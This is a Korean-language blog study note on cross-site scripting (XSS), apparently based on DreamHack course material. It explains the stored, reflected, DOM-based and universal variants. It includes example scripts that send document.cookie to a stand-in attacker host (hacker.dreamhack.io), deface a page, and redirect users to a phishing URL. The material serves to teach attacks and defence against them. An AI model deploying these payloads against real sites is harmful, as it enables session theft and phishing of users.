본문 바로가기
Web_Hacking

XSS(Cross Site Scripting)

YuJaeHyun 2023. 3. 6. 22:01

▶ Background

  • 클라이언트 사이드 취약점 중 하나
  • 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 악성 스크립트를 실행
  • 공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행 가능
  • 자바스크립트는 다양한 동작을 정의할 수 있기 때문에 XSS 공격에 주로 사용됩니다. 자바스크립트를 실행하기 위한 태그로는 <script>가 있음

 클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 받은 응답, 즉 HTML, CSS, JS 등의 웹 리소스를 시각화하여 사용자에게 제공. 이때, HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있음

 

Stored XSS XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
Reflected XSS XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
DOM-based XSS XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS
Universal XSS 클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS

 

쿠키세션탈취 코드

<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

 

페이지 변경 코드

<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

 

위치이동공격코드

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>

 

 

Stored XSS

  • Stored XSS는 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS
  • 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 대표적
  • 게시물은 불특정 다수에게 보여지기 때문에 해당 기능에서 XSS 취약점이 존재할 경우 높은 파급력을 가짐
  • 게시판같은곳에 script적어서 저장해놓는 방식

 

 Reflected XSS

  • 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생
  • 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 대표적
    • 이용자가 게시물을 검색하면 서버에서는 검색 결과를 이용자에게 반환
    • 일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS 발생 
  • Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생
  • 공격을 위해서는 타 이용자에게 악성 스크립트가 포함된 링크에 접속하도록 유도해야 함
  • 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용

 

 

 

저작자표시 (새창열림)

'Web_Hacking' 카테고리의 다른 글

web_hacking  (0) 2023.09.19
SOP(Same Origin Policy)  (0) 2023.01.13
CSRF  (0) 2022.09.16

'Web_Hacking' Related Articles

티스토리툴바